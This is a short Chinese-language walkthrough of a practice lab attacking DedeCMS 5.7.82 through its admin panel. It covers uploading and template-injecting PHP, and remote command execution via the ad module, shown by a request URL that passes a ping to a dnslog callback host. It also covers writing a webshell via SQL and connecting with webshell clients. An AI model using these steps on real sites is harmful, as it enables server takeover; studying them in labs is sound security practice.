DeDeCMS靶场攻略

文件管理器

点击模块,选择上传文件

在电脑中新建2.php

<?php phpinfo();?>

访问2.php,验证是否成功

修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

点击[代码]

得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir

在得到的目录下写入木马文件

访问后得到12.php

这些成功后可以用蚁剑,caidao连接

相关推荐
走在路上的菜鸟8 分钟前
Android学Dart学习笔记第十九节 类-混入Mixins
android·笔记·学习·flutter
sang_xb26 分钟前
Android 系统的权限管理最佳实践
android·开发语言
用户41659673693551 小时前
Jetpack Compose 中 AndroidView 的生命周期管理与 WebView 实践
android
用户83352502537851 小时前
android 后台应用申请音频焦点失败
android
zhuhai06131 小时前
Android Socket 深度剖析:从原理到实战
android
毕设源码-朱学姐1 小时前
【开题答辩全过程】以 基于Android的留守儿童贫困资助管理系统的设计与实现为例,包含答辩的问题和答案
android
愤怒的代码1 小时前
深入理解 IdleHandler:从启动优化到内存管理
android·架构·kotlin
恋猫de小郭1 小时前
OpenAI :你不需要跨平台框架,只需要在 Android 和 iOS 上使用 Codex
android·前端·openai
路在脚下,梦在心里2 小时前
net学习总结
android·学习
走在路上的菜鸟2 小时前
Android学Dart学习笔记第二十节 类-枚举
android·笔记·学习·flutter